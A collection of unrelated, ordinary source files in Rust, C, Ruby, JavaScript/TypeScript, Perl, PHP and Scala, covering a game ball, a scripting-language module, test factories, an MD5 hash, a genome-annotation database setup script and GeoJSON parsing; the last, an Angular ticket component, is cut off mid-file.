    /// Advance the position by one velocity step (Euler integration).
    pub fn update(&mut self) {
        self.location += self.velocity;
    }

    /// Replace the current velocity outright.
    pub fn set_velocity(&mut self, new_velocity: Vector2<f32>) {
        self.velocity = new_velocity;
    }

    /// Accelerate the ball by adding `force` to its velocity.
    pub fn apply_force(&mut self, force: Vector2<f32>) {
        self.velocity += force;
    }

    /// Teleport the ball to `new_location`.
    pub fn reset_location(&mut self, new_location: Vector2<f32>) -> GameResult<()> {
        self.location = new_location;
        Ok(())
    }

    /// Radius of the ball.
    pub fn get_size(&self) -> GameResult<f32> {
        Ok(self.size)
    }
}
|
#include "melon/modules/function/function_module.h"
#include "melon/modules/modules.h"
#include "melon/core/closure.h"
#include "melon/core/array.h"
#include "melon/core/tstring.h"
/***
* @module
*
* This module can be used to programmatically interact with [`Function`](function.md)
* values. Most of the functions in this module can be built upon to enable
* basic functional programming patterns.
*/
#include <stdlib.h>
#include <assert.h>
/***
 * Calls a function value programmatically
 *
 * @arg func The function to be invoked
 * @arg args An array of arguments with which the function will be invoked
 *
 * @returns Whatever the original function returned
 */
static TByte callFunc(VM* vm)
{
    melM_arg(vm, func, MELON_TYPE_CLOSURE, 0);
    melM_arg(vm, args, MELON_TYPE_ARRAY, 1);
    /* Push the callee first, then each array element as an argument. */
    melM_stackPush(&vm->stack, func);
    Array* arrObj = melM_arrayFromObj(args->pack.obj);
    for (TSize i = 0; i < arrObj->count; i++)
    {
        Value* val = melGetIndexArray(vm, args->pack.obj, i);
        melM_stackPush(&vm->stack, val);
    }
    /* Synchronous call with arrObj->count arguments; the trailing (0, 1)
     * flags presumably request a single result — TODO confirm against the
     * melCallClosureSyncVM signature. The result is left on the stack. */
    melCallClosureSyncVM(vm, arrObj->count, 0, 1);
    // @TODO: Multiple returns not supported
    return 1;
}
/***
 * Gets the name of a function value
 *
 * @arg func The function to extract the name from
 *
 * @returns The function's name if set, the placeholder string
 *          "@anonymous@" otherwise
 */
static TByte getNameFunc(VM* vm)
{
    melM_arg(vm, func, MELON_TYPE_CLOSURE, 0);
    Closure* cl = melM_closureFromObj(func->pack.obj);
    Function* fn = melM_functionFromObj(cl->fn);
    Value res;
    res.type = MELON_TYPE_STRING;
    if (fn->name != NULL)
    {
        /* Reuse the function's stored name object directly. */
        res.pack.obj = fn->name;
    }
    else
    {
        /* Anonymous function: return a freshly allocated placeholder. */
        res.pack.obj = melNewString(vm, "@anonymous@", strlen("@anonymous@"));
    }
    /* The pushed value is this native's single return value. */
    melM_stackPush(&vm->stack, &res);
    return 1;
}
/***
 * Gets the number of arguments a given function expects
 *
 * @arg func The function to inspect
 *
 * @returns An integer representing the number of expected arguments
 */
static TByte getArgsCountFunc(VM* vm)
{
    melM_arg(vm, func, MELON_TYPE_CLOSURE, 0);
    /* Unwrap closure -> function prototype to read its declared arity. */
    Closure* cl = melM_closureFromObj(func->pack.obj);
    Function* fn = melM_functionFromObj(cl->fn);
    Value res;
    res.type = MELON_TYPE_INTEGER;
    res.pack.value.integer = fn->args;
    melM_stackPush(&vm->stack, &res);
    return 1;
}
/***
 * Returns the path to the file in which a given function value was defined.
 * If the function is built-in or was defined in some non-standard way `null`
 * will be returned.
 *
 * @arg func The function to inspect
 *
 * @returns A string containing the path to the file or `null`
 */
static TByte getFileFunc(VM* vm)
{
    melM_arg(vm, func, MELON_TYPE_CLOSURE, 0);
    Closure* cl = melM_closureFromObj(func->pack.obj);
    Function* fn = melM_functionFromObj(cl->fn);
    Value res;
    /* Default to null; only upgraded when debug info carries a file path. */
    res.type = MELON_TYPE_NULL;
    if (fn->debug.file != NULL)
    {
        res.type = MELON_TYPE_STRING;
        res.pack.obj = melNewString(vm, fn->debug.file, strlen(fn->debug.file));
    }
    melM_stackPush(&vm->stack, &res);
    return 1;
}
/* Module export table: one row per native, NULL-terminated.
 * Columns: exported name, argument count, local slot count, C function. */
static const ModuleFunction funcs[] = {
    // name, args, locals, func
    { "call", 2, 0, &callFunc },
    { "getName", 1, 0, &getNameFunc },
    { "getArgsCount", 1, 0, &getArgsCountFunc },
    { "getFile", 1, 0, &getFileFunc },
    { NULL, 0, 0, NULL }
};

/* Entry point: registers the table above as the `function` module. */
TRet melFunctionModuleInit(VM* vm)
{
    return melNewModule(vm, funcs);
}
|
# FactoryBot factory producing Deposit records for tests.
FactoryBot.define do
  factory :deposit do
    # Default human-readable description for a test deposit.
    description { "Deposit" }
  end
end
|
use crossterm::event::KeyModifiers;
/// Modifier set representing "no modifier keys held".
pub const NONE_MODIFIER: KeyModifiers = KeyModifiers::empty();
#[macro_use]
/// Builds a `crossterm::event::KeyEvent` from a compact description:
/// `key!(^'c')` -> Ctrl+'c', `key!('c')` -> plain 'c', and
/// `key!(Enter)` / `key!(F(5))` -> any other `KeyCode` variant, unmodified.
macro_rules! key {
    // Control + character key: key!(^'c')
    (^$key:literal) => {
        crossterm::event::KeyEvent {
            code: crossterm::event::KeyCode::Char($key),
            modifiers: crossterm::event::KeyModifiers::CONTROL,
        }
    };
    // Plain character key: key!('c')
    ($key:literal) => {
        crossterm::event::KeyEvent {
            code: crossterm::event::KeyCode::Char($key),
            modifiers: crate::macros::NONE_MODIFIER,
        }
    };
    // Any other KeyCode variant, e.g. key!(Enter) or key!(F(5))
    ($($key:tt)+) => {
        crossterm::event::KeyEvent {
            code: crossterm::event::KeyCode::$($key)+,
            modifiers: crate::macros::NONE_MODIFIER,
        }
    };
}
|
module DataScience
  # Reads raw input files into memory for downstream processing.
  class Importer
    class << self
      # Public entry point; currently equivalent to .read.
      def load(input_file)
        read(input_file)
      end

      # Slurp the whole file and return its contents as a String.
      def read(input_file)
        IO.read(input_file)
      end
    end
  end
end
|
import { connect } from 'react-redux'
import PermissionPageContainer from './permission-page-container.component'
import {
getSelectedIdentity,
getPermissionsDescriptions,
getPermissionsRequests,
getDomainMetadata,
} from '../../../selectors/selectors'
import { hideLoadingIndication, showLoadingIndication } from '../../../store/actions'
// Map loading-indicator actions to props.
// BUG FIX: the action creators must be *invoked* before dispatching; the
// original dispatched the creator functions themselves, so no plain action
// object ever reached the store.
const mapDispatchToProps = dispatch => {
  return {
    hideLoadingIndication: () => dispatch(hideLoadingIndication()),
    showLoadingIndication: () => dispatch(showLoadingIndication()),
  }
}
// Derive the pending permission request (if any) and a map of
// human-readable descriptions for each requested permission key.
const mapStateToProps = (state) => {
  const requests = getPermissionsRequests(state) || []
  // BUG FIX: guard against an empty request queue; requests[0] was
  // dereferenced unconditionally and threw when nothing was pending.
  const requestedPermissions = (requests[0] && requests[0].permissions) || {}
  const requestedPermissionsKeys = Object.keys(requestedPermissions)
  const permissionsDescriptions = getPermissionsDescriptions(state)
  const requestedPermissionsDescriptions = requestedPermissionsKeys.reduce((acc, requestedPermissionKey) => {
    const requestedPermissionKeyParts = requestedPermissionKey.split('_')
    // TODO we should check if this matches a wildcard permission in a better way
    const isWildCardPermission = requestedPermissionKeyParts.length === 3
    let permissionDescription
    if (permissionsDescriptions[requestedPermissionKey]) {
      permissionDescription = permissionsDescriptions[requestedPermissionKey]
    } else if (isWildCardPermission) {
      // e.g. "eth_foo_bar" -> look up the "eth_foo_*" template and
      // substitute the parameter segment ("bar") for "$1".
      const wildCardPermissionParameter = requestedPermissionKeyParts[2]
      const wildCardPermissionFixedSegment = requestedPermissionKeyParts.slice(0, 2).join('_')
      const wildCardPermissionDescription = permissionsDescriptions[`${wildCardPermissionFixedSegment}_*`]
      // BUG FIX: the wildcard template may be missing; calling .replace on
      // undefined threw. Fall back to the raw permission key.
      permissionDescription = wildCardPermissionDescription
        ? wildCardPermissionDescription.replace('$1', wildCardPermissionParameter)
        : requestedPermissionKey
    }
    return {
      ...acc,
      [requestedPermissionKey]: permissionDescription,
    }
  }, {})
  return {
    requests,
    selectedIdentity: getSelectedIdentity(state),
    permissionsDescriptions: requestedPermissionsDescriptions,
    domainMetadata: getDomainMetadata(state),
  }
}
export default connect(mapStateToProps, mapDispatchToProps)(PermissionPageContainer)
|
import { Injectable } from '@angular/core';
import { InMemoryDbService } from 'angular-in-memory-web-api';
/**
 * In-memory mock database serving `credentials` and `users` collections
 * through the angular-in-memory-web-api backend.
 */
@Injectable()
export class InMemoryDataService implements InMemoryDbService {
  /** Build and return the mock collections exposed by the fake API. */
  createDb() {
    const credentials = [
      { name: 'admin', password: 'admin' },
      { name: 'user', password: 'user' }
    ];
    const users = [
      { id: 11, name: 'Mohan Ram', contact: '9456232123', address: 'Theni' },
      { id: 12, name: 'Satish', contact: '8834187432', address: 'Chennai' }
    ];
    return { users, credentials };
  }
}
|
#!/usr/bin/perl
# documentation at end of file
# db_setup.pl -- downloads UCSC annotation for a genome build (via the
# companion ucsc_table2gff3.pl script) and loads it into a local
# Bio::DB::SeqFeature::Store SQLite database for use with BioToolBox.
use strict;
use Getopt::Long;
use Pod::Usage;
use File::Spec;
use FindBin qw($Bin);
use Bio::ToolBox::db_helper::config qw(add_database);
use Bio::ToolBox::db_helper qw(open_db_connection);
use Bio::DB::SeqFeature::Store;
use Bio::DB::SeqFeature::Store::GFF3Loader;
# check for additional requirements
# DBD::SQLite is an optional dependency, so probe for it at runtime
my $sql;
eval {
require DBD::SQLite;
$sql = 1;
};
my $VERSION = '1.19';
print "\n This program will set up an annotation database\n\n";
### Quick help
unless (@ARGV) {
# when no command line options are present
# print SYNOPSIS
pod2usage( {
'-verbose' => 0,
'-exitval' => 1,
} );
}
### Get command line options and initialize values
my (
$ucscdb,
$path,
$keep,
$verbose,
$help,
$print_version,
);
my @tables;
# Command line options
GetOptions(
'db=s' => \$ucscdb, # the UCSC database shortname
'path=s' => \$path, # the optional path for the database
'table=s' => \@tables, # which tables to collect
'keep!' => \$keep, # keep the annotation files
'verbose!' => \$verbose, # show db loading
'help' => \$help, # request help
'version' => \$print_version, # print the version
) or die " unrecognized option(s)!! please refer to the help documentation\n\n";
# Print help
if ($help) {
# print entire POD
pod2usage( {
'-verbose' => 2,
'-exitval' => 1,
} );
}
# Print version
if ($print_version) {
print " BioToolBox script db_setup.pl, version $VERSION\n";
eval {
require Bio::ToolBox;
my $v = Bio::ToolBox->VERSION;
print " Biotoolbox package version $v\n";
};
exit;
}
### Check for requirements
unless ($sql) {
die " Please install Perl module DBD::SQLite to set up a database\n";
}
unless ($ucscdb) {
# fall back to the first bare command-line argument as the database name
$ucscdb = shift @ARGV or
die " no database name provided! use --help for more information\n";
}
if ($path) {
$path = File::Spec->rel2abs($path);
unless (-e $path) {
mkdir $path or die "unable to make database path $path\n$!\n";
}
# "-w _" reuses the stat buffer populated by the -e test above
unless (-w _) {
die " $path is not writable!\n";
}
}
else {
# determine a path
# prefer ~/Library (macOS convention), then ~/lib, creating ~/lib if neither exists
if (-e File::Spec->catdir($ENV{HOME}, 'Library')) {
$path = File::Spec->catdir($ENV{HOME}, 'Library');
}
elsif (-e File::Spec->catdir($ENV{HOME}, 'lib')) {
$path = File::Spec->catdir($ENV{HOME}, 'lib');
}
else {
# make one for us
$path = File::Spec->catdir($ENV{HOME}, 'lib');
mkdir $path or die "unable to make database path $path\n$!\n";
}
}
if (@tables) {
# accept a single comma-delimited list as well as repeated --table options
if ($tables[0] =~ /,/) {
my $t = shift @tables;
@tables = split /,/, $t;
}
}
else {
@tables = qw(refgene ensgene knowngene);
}
my $start_time = time;
### Get UCSC annotation
print "##### Fetching annotation from UCSC. This may take a while ######\n";
# NOTE(review): catdir is used here to join a file name; catfile is the
# conventional call -- works on common platforms, but worth confirming
system(File::Spec->catdir($Bin, 'ucsc_table2gff3.pl'), '--db', $ucscdb, '--ftp',
join(',', @tables), '--gz') == 0 or
die "unable to execute ucsc_table2gff3 script!\n";
# the helper script writes its output into the current working directory
my @gff = glob("$ucscdb*.gff3.gz");
my @source = glob("$ucscdb*.txt.gz");
unless (@gff) {
die "unable to find new GFF3 files!\n";
}
### Build database
print "##### Building database. This may take a while ######\n";
my $database = File::Spec->catdir($path, "$ucscdb.sqlite");
my $temp = File::Spec->tmpdir();
# create a database
my $store = Bio::DB::SeqFeature::Store->new(
-dsn => $database,
-adaptor => 'DBI::SQLite',
-tmpdir => $temp,
-write => 1,
-create => 1,
-compress => 0, # compression seems to be broken, cannot read db
) or die " Cannot create a SeqFeature database connection!\n";
# load the database
my $loader = Bio::DB::SeqFeature::Store::GFF3Loader->new(
-store => $store,
-sf_class => 'Bio::DB::SeqFeature',
-verbose => $verbose,
-tmpdir => $temp,
-fast => 1,
-ignore_seqregion => 0,
-index_subfeatures => 1,
-noalias_target => 0,
-summary_stats => 0,
)or die " Cannot create a GFF3 loader for the database!\n";
# on signals, give objects a chance to call their DESTROY methods
# borrowed from bp_seqfeature_load.pl
$SIG{TERM} = $SIG{INT} = sub { undef $loader; undef $store; die "Aborted..."; };
$loader->load(@gff);
### Check database
# verify the database file exists, is non-empty, and can actually be opened
my $db;
if (-e $database and -s _) {
$db = open_db_connection($database);
}
if ($db) {
print "\n##### Created database $database ######\n";
printf " Finished in %.1f minutes\n\n", (time - $start_time) / 60;
# record the new database in the BioToolBox configuration file so other
# scripts can refer to it by its short name
my $a = add_database(
'name' => $ucscdb,
'dsn' => $database,
'adaptor' => 'DBI::SQLite',
);
if ($a) {
print <<SUCCESS;
The database configuration was added to the BioToolBox configuration
file. You may use the database in any BioToolBox script with the
option --db $ucscdb.
You can check the database now by running
db_types.pl $ucscdb
SUCCESS
}
}
else {
# loading failed; remove the partial database file
print "##### Something went wrong! Database could not be opened #####\n";
unlink $database if -e $database;
}
### Clean up
# remove downloaded and intermediate files unless --keep was requested
if ($db and not $keep) {
unlink @gff;
unlink @source;
}
__END__
=head1 NAME
db_setup.pl
=head1 SYNOPSIS
db_setup.pl [--options...] <UCSC database>
Options:
--db <UCSC database>
--path </path/to/store/database>
--table [refGene|ensGene|knownGene|xenoRefGene|all]
--keep
--verbose
--version
--help
=head1 OPTIONS
The command line flags and descriptions:
=over 4
=item --db <UCSC database>
Provide the short UCSC database name for the species and version you want
to use. See L<http://genome.ucsc.edu/FAQ/FAQreleases.html> for a current
list of available UCSC genomes. Examples include hg19, mm10, danRer7,
sacCer3, etc.
=item --path </path/to/store/database>
Specify the optional path to store the SQLite database file. The default
path is C<~/lib>.
=item --table [refGene|ensGene|knownGene|xenoRefGene|all]
Provide one or more UCSC tables to load into the database. They may be
specified as comma-delimited list (no spaces) or as separate, repeated
arguments. The default is refGene, ensGene, and knownGene (if available).
=item --keep
Keep the downloaded UCSC tables and converted GFF3 files. Default is to
delete them.
=item --verbose
Show realtime database loading progress.
=item --version
Print the version number.
=item --help
Display this POD documentation.
=back
=head1 DESCRIPTION
This program will simplify the task of generating an annotation database. You
provide the short name of the UCSC database for the species and genome version
you are interested in, and the script will automatically download gene annotation
and build a I<Bio::DB::SeqFeature::Store> database for use with BioToolBox
scripts.
=head1 AUTHOR
Timothy J. Parnell, PhD
Dept of Oncological Sciences
Huntsman Cancer Institute
University of Utah
Salt Lake City, UT, 84112
This package is free software; you can redistribute it and/or modify
it under the terms of the Artistic License 2.0.
|
import { bytesToHex, bytesToWords, endian, Md5Sha1Options, wordsToBytes } from "./crypt";
import { bin, utf8 } from "../charenc";
declare const Buffer;
/** MD5 round-1 step: F(b,c,d) = (b AND c) OR (NOT b AND d), then rotate-left by s and add b. */
function FF(a, b, c, d, x, s, t) {
  const f = (b & c) | (~b & d);
  const sum = a + f + (x >>> 0) + t;
  const rotated = (sum << s) | (sum >>> (32 - s));
  return rotated + b;
}
/** MD5 round-2 step: G(b,c,d) = (b AND d) OR (c AND NOT d), then rotate-left by s and add b. */
function GG(a, b, c, d, x, s, t) {
  const g = (b & d) | (c & ~d);
  const sum = a + g + (x >>> 0) + t;
  const rotated = (sum << s) | (sum >>> (32 - s));
  return rotated + b;
}
/** MD5 round-3 step: H(b,c,d) = b XOR c XOR d, then rotate-left by s and add b. */
function HH(a, b, c, d, x, s, t) {
  const h = b ^ c ^ d;
  const sum = a + h + (x >>> 0) + t;
  const rotated = (sum << s) | (sum >>> (32 - s));
  return rotated + b;
}
/** MD5 round-4 step: I(b,c,d) = c XOR (b OR NOT d), then rotate-left by s and add b. */
function II(a, b, c, d, x, s, t) {
  const i = c ^ (b | ~d);
  const sum = a + i + (x >>> 0) + t;
  const rotated = (sum << s) | (sum >>> (32 - s));
  return rotated + b;
}
/**
 * Core MD5 transform (RFC 1321).
 * Accepts a string (decoded as UTF-8, or raw bytes when
 * options.encoding === 'binary'), a Node Buffer, or a byte array;
 * anything else is stringified first. Returns the four 32-bit state
 * words [a, b, c, d] passed through `endian` for final byte order.
 * NOTE(review): non-array, non-string, non-Buffer inputs are converted
 * with toString() but NOT re-encoded to bytes -- confirm callers only
 * pass the supported types.
 */
function _md5(message, options: Md5Sha1Options) {
let i;
// Convert to byte array
if (message.constructor == String)
if (options && options.encoding === 'binary')
message = bin.stringToBytes(message);
else
message = utf8.stringToBytes(message);
else if (typeof Buffer !== 'undefined' && typeof Buffer.isBuffer == 'function' && Buffer.isBuffer(message))
message = Array.prototype.slice.call(message, 0);
else if (!Array.isArray(message))
message = message.toString();
// else, assume byte array already
// m: message as 32-bit words; l: original length in bits (used for padding)
const m = bytesToWords(message),
l = message.length * 8;
// Initial MD5 state (A, B, C, D) per RFC 1321
let a = 1732584193,
b = -271733879,
c = -1732584194,
d = 271733878;
// Swap endian
for (i = 0; i < m.length; i++) {
m[i] = ((m[i] << 8) | (m[i] >>> 24)) & 0x00FF00FF |
((m[i] << 24) | (m[i] >>> 8)) & 0xFF00FF00;
}
// Padding
// append a single 1 bit, then the 64-bit message length in the last block
m[l >>> 5] |= 0x80 << (l % 32);
m[(((l + 64) >>> 9) << 4) + 14] = l;
// Process each 512-bit (16-word) block; constants/shifts follow RFC 1321.
for (i = 0; i < m.length; i += 16) {
const aa = a, bb = b, cc = c, dd = d;
// Round 1 (F)
a = FF(a, b, c, d, m[i + 0], 7, -680876936);
d = FF(d, a, b, c, m[i + 1], 12, -389564586);
c = FF(c, d, a, b, m[i + 2], 17, 606105819);
b = FF(b, c, d, a, m[i + 3], 22, -1044525330);
a = FF(a, b, c, d, m[i + 4], 7, -176418897);
d = FF(d, a, b, c, m[i + 5], 12, 1200080426);
c = FF(c, d, a, b, m[i + 6], 17, -1473231341);
b = FF(b, c, d, a, m[i + 7], 22, -45705983);
a = FF(a, b, c, d, m[i + 8], 7, 1770035416);
d = FF(d, a, b, c, m[i + 9], 12, -1958414417);
c = FF(c, d, a, b, m[i + 10], 17, -42063);
b = FF(b, c, d, a, m[i + 11], 22, -1990404162);
a = FF(a, b, c, d, m[i + 12], 7, 1804603682);
d = FF(d, a, b, c, m[i + 13], 12, -40341101);
c = FF(c, d, a, b, m[i + 14], 17, -1502002290);
b = FF(b, c, d, a, m[i + 15], 22, 1236535329);
// Round 2 (G)
a = GG(a, b, c, d, m[i + 1], 5, -165796510);
d = GG(d, a, b, c, m[i + 6], 9, -1069501632);
c = GG(c, d, a, b, m[i + 11], 14, 643717713);
b = GG(b, c, d, a, m[i + 0], 20, -373897302);
a = GG(a, b, c, d, m[i + 5], 5, -701558691);
d = GG(d, a, b, c, m[i + 10], 9, 38016083);
c = GG(c, d, a, b, m[i + 15], 14, -660478335);
b = GG(b, c, d, a, m[i + 4], 20, -405537848);
a = GG(a, b, c, d, m[i + 9], 5, 568446438);
d = GG(d, a, b, c, m[i + 14], 9, -1019803690);
c = GG(c, d, a, b, m[i + 3], 14, -187363961);
b = GG(b, c, d, a, m[i + 8], 20, 1163531501);
a = GG(a, b, c, d, m[i + 13], 5, -1444681467);
d = GG(d, a, b, c, m[i + 2], 9, -51403784);
c = GG(c, d, a, b, m[i + 7], 14, 1735328473);
b = GG(b, c, d, a, m[i + 12], 20, -1926607734);
// Round 3 (H)
a = HH(a, b, c, d, m[i + 5], 4, -378558);
d = HH(d, a, b, c, m[i + 8], 11, -2022574463);
c = HH(c, d, a, b, m[i + 11], 16, 1839030562);
b = HH(b, c, d, a, m[i + 14], 23, -35309556);
a = HH(a, b, c, d, m[i + 1], 4, -1530992060);
d = HH(d, a, b, c, m[i + 4], 11, 1272893353);
c = HH(c, d, a, b, m[i + 7], 16, -155497632);
b = HH(b, c, d, a, m[i + 10], 23, -1094730640);
a = HH(a, b, c, d, m[i + 13], 4, 681279174);
d = HH(d, a, b, c, m[i + 0], 11, -358537222);
c = HH(c, d, a, b, m[i + 3], 16, -722521979);
b = HH(b, c, d, a, m[i + 6], 23, 76029189);
a = HH(a, b, c, d, m[i + 9], 4, -640364487);
d = HH(d, a, b, c, m[i + 12], 11, -421815835);
c = HH(c, d, a, b, m[i + 15], 16, 530742520);
b = HH(b, c, d, a, m[i + 2], 23, -995338651);
// Round 4 (I)
a = II(a, b, c, d, m[i + 0], 6, -198630844);
d = II(d, a, b, c, m[i + 7], 10, 1126891415);
c = II(c, d, a, b, m[i + 14], 15, -1416354905);
b = II(b, c, d, a, m[i + 5], 21, -57434055);
a = II(a, b, c, d, m[i + 12], 6, 1700485571);
d = II(d, a, b, c, m[i + 3], 10, -1894986606);
c = II(c, d, a, b, m[i + 10], 15, -1051523);
b = II(b, c, d, a, m[i + 1], 21, -2054922799);
a = II(a, b, c, d, m[i + 8], 6, 1873313359);
d = II(d, a, b, c, m[i + 15], 10, -30611744);
c = II(c, d, a, b, m[i + 6], 15, -1560198380);
b = II(b, c, d, a, m[i + 13], 21, 1309151649);
a = II(a, b, c, d, m[i + 4], 6, -145523070);
d = II(d, a, b, c, m[i + 11], 10, -1120210379);
c = II(c, d, a, b, m[i + 2], 15, 718787259);
b = II(b, c, d, a, m[i + 9], 21, -343485551);
// fold the block's result back into the running state (mod 2^32)
a = (a + aa) >>> 0;
b = (b + bb) >>> 0;
c = (c + cc) >>> 0;
d = (d + dd) >>> 0;
}
return endian([a, b, c, d]);
}
/**
 * Computes the MD5 digest of `content` (coerced to a string, UTF-8 encoded)
 * and returns it as a lowercase hex string.
 */
export function md5(content: string | number): string {
  const digestWords = _md5(String(content), undefined);
  return bytesToHex(wordsToBytes(digestWords));
}
|
<?php
// Bitrix language strings for the jobs/vacancies block component.
// Uses the full "<?php" open tag: the short "<?" form requires the
// short_open_tag ini setting, which is off by default, and would leak
// this file's contents as plain text. Closing tag omitted per PSR-12.
$MESS["T_IBLOCK_NAME_BLOCK"] = "Jobs Block Title";
$MESS["T_IBLOCK_DESC_NAME_BLOCK"] = "Vacancies";
|
/*
* This software is licensed under the Apache 2 license, quoted below.
*
* Copyright 2019 Astraea, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* [http://www.apache.org/licenses/LICENSE-2.0]
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*
* SPDX-License-Identifier: Apache-2.0
*
*/
package org.locationtech.rasterframes.datasource.geojson
import geotrellis.vector.Extent
import org.locationtech.jts.geom.{Envelope, Geometry}
import org.locationtech.jts.io.geojson.{GeoJsonReader, GeoJsonWriter}
import spray.json.DefaultJsonProtocol._
import spray.json._
/**
* Lightweight DOM for parsing GeoJSON feature sets.
*
* @since 7/17/18
*/
object DOM {
// JSON codec for JTS Envelope. GeoJSON bboxes arrive as
// [west, south, east, north] (2D) or
// [west, south, minAlt, east, north, maxAlt] (3D); altitudes are dropped.
// Note the Envelope constructor takes (x1, x2, y1, y2), hence the
// (west, east, south, north) argument order below.
implicit val envelopeFormat: RootJsonFormat[Envelope] = new RootJsonFormat[Envelope] {
override def read(json: JsValue): Envelope = json match {
case JsArray(Vector(JsNumber(west), JsNumber(south), JsNumber(east), JsNumber(north))) =>
new Envelope(west.toDouble, east.toDouble, south.toDouble, north.toDouble)
case JsArray(
Vector(JsNumber(west), JsNumber(south), _, JsNumber(east), JsNumber(north), _)) =>
new Envelope(west.toDouble, east.toDouble, south.toDouble, north.toDouble)
case x => deserializationError("Expected Array as JsArray, but got " + x)
}
// Serializes in GeoJSON bbox order: [minX, minY, maxX, maxY].
override def write(obj: Envelope): JsValue =
JsArray(
Vector(
JsNumber(obj.getMinX),
JsNumber(obj.getMinY),
JsNumber(obj.getMaxX),
JsNumber(obj.getMaxY)
)
)
}
// Same bbox codec for the GeoTrellis Extent type, whose constructor takes
// (xmin, ymin, xmax, ymax) -- i.e. (west, south, east, north) directly.
implicit val extentFormat: RootJsonFormat[Extent] = new RootJsonFormat[Extent] {
override def read(json: JsValue): Extent = json match {
case JsArray(Vector(JsNumber(west), JsNumber(south), JsNumber(east), JsNumber(north))) =>
Extent(west.toDouble, south.toDouble, east.toDouble, north.toDouble)
case JsArray(
Vector(JsNumber(west), JsNumber(south), _, JsNumber(east), JsNumber(north), _)) =>
Extent(west.toDouble, south.toDouble, east.toDouble, north.toDouble)
case x => deserializationError("Expected Array as JsArray, but got " + x)
}
override def write(obj: Extent): JsValue =
JsArray(
Vector(
JsNumber(obj.xmin),
JsNumber(obj.ymin),
JsNumber(obj.xmax),
JsNumber(obj.ymax)
)
)
}
// A GeoJSON FeatureCollection reduced to just its "features" array.
case class GeoJsonFeatureSet(features: Seq[GeoJsonFeature])
object GeoJsonFeatureSet {
implicit val domFormat: RootJsonFormat[GeoJsonFeatureSet] = jsonFormat1(GeoJsonFeatureSet.apply)
}
// A single GeoJSON Feature: its geometry, optional bbox, and raw properties.
// NOTE(review): featureFormat references geomFormat, which is declared later
// in this object -- the forward reference is intentional here; do not reorder
// without checking initialization order.
case class GeoJsonFeature(
geometry: Geometry,
bbox: Option[Extent],
properties: Map[String, JsValue])
object GeoJsonFeature {
implicit val featureFormat: RootJsonFormat[GeoJsonFeature] = jsonFormat3(GeoJsonFeature.apply)
}
// Geometry codec that round-trips through JTS's own GeoJSON reader/writer
// instead of hand-rolling coordinate parsing.
implicit val geomFormat: RootJsonFormat[Geometry] = new RootJsonFormat[Geometry] {
def read(json: JsValue): Geometry = {
val reader = new GeoJsonReader()
reader.read(json.compactPrint)
}
def write(obj: Geometry): JsValue = {
val writer = new GeoJsonWriter()
writer.write(obj).parseJson
}
}
}
|
/// One node of the license tree: its child nodes plus a borrowed slice of
/// this node's metadata entries. `len` caches the total number of input
/// entries the node spans so a parent can skip past an already-parsed child.
#[derive(Debug)]
struct Node<'a> {
children: Vec<Node<'a>>,
metadata: &'a [i32],
len: usize,
}
impl Node<'_> {
fn checksum(&self) -> i32 {
self.metadata.iter().sum::<i32>() + self.children.iter().map(|x| x.checksum()).sum::<i32>()
}
fn value(&self) -> i32 {
if self.children.is_empty() {
self.metadata.iter().sum()
} else {
self.metadata.iter().fold(0, |a, b| {
let added_value = self
.children
.get((b - 1) as usize)
.map(|x| x.value())
.unwrap_or(0);
a + added_value
})
}
}
fn len(&self) -> usize {
self.len
}
}
/// The two-entry header that starts every node: the number of child nodes
/// followed by the number of metadata entries.
struct Header {
children: usize,
metadata: usize,
}
impl Header {
    /// Reads the two-entry header (child count, metadata count) from the
    /// start of a license slice, failing with `NodeError::Header` when the
    /// slice is too short.
    fn extract(license: &[i32]) -> Result<Header, NodeError> {
        let children = license.first().copied().ok_or(NodeError::Header)? as usize;
        let metadata = license.get(1).copied().ok_or(NodeError::Header)? as usize;
        Ok(Header { children, metadata })
    }
}
/// Parse failures: a truncated header or a body shorter than the header declares.
#[derive(Debug)]
enum NodeError {
Header,
Body,
}
/// Entry point: parse the embedded license input into a tree and print the
/// checksum (part 1) followed by the root value (part 2).
fn main() -> Result<(), NodeError> {
    let values = license_values();
    let root = build_tree(&values)?;
    println!("{}", root.checksum());
    println!("{}", root.value());
    Ok(())
}
/// Recursively parses the node that starts at `license[0]`.
///
/// Entry layout: [child_count, metadata_count, child nodes..., metadata...].
/// Returns `NodeError::Body` when the slice is too short to hold the declared
/// children or metadata, instead of panicking on an out-of-bounds slice as
/// the previous `&license[offset..]` indexing could.
fn build_tree(license: &[i32]) -> Result<Node, NodeError> {
    // Offset is initialized to the width of the header.
    let mut offset = 2;
    let mut children = Vec::new();
    let header = Header::extract(license)?;
    for _ in 0..header.children {
        // Checked sub-slice: a truncated input yields an error, not a panic.
        let child = build_tree(license.get(offset..).ok_or(NodeError::Body)?)?;
        offset += child.len();
        children.push(child);
    }
    // Checked metadata slice; `get` also guarantees the exact length, so the
    // separate length comparison the old code did is no longer needed.
    let metadata = license
        .get(offset..offset + header.metadata)
        .ok_or(NodeError::Body)?;
    Ok(Node {
        children,
        metadata,
        len: offset + header.metadata,
    })
}
/// Loads the puzzle input (embedded at compile time) and returns its
/// whitespace-separated integer tokens, silently skipping unparsable ones.
fn license_values() -> Vec<i32> {
    static INPUT: &str = include_str!("../input.txt");
    INPUT
        .split_whitespace()
        .filter_map(|token| token.parse::<i32>().ok())
        .collect()
}
|
import { Component, OnInit } from '@angular/core';
import { Validators, FormBuilder, FormGroup } from '@angular/forms';
import { ActivatedRoute, Router } from '@angular/router';
import { TicketsService } from '../tickets.service';
import { ToasterService } from 'angular2-toaster';
import { ValidationService } from '../../common/utils/validation.service';
@Component({
  selector: 'app-ticket-update',
  templateUrl: './ticket-update.component.html',
  styleUrls: ['./ticket-update.component.css']
})
export class TicketUpdateComponent implements OnInit {
  /** Form fields copied verbatim into the multipart request body, in wire order. */
  private static readonly FORM_FIELDS = [
    'objet', 'nom', 'element', 'etat', 'date_d_ouverture', 'date_d_echeance',
    'categorie', 'num_agence', 'departement', 'impact', 'lieu', 'commentaire',
    'description'
  ];

  /** Id of the ticket being edited, read from the route parameter `:id`. */
  ticketID = null;
  /** Attachment selected by the user, or null when none has been chosen. */
  file = null;
  ticketUpdateForm: FormGroup;
  /** Set on first submit attempt; the template uses it to reveal validation errors. */
  submitted = false;

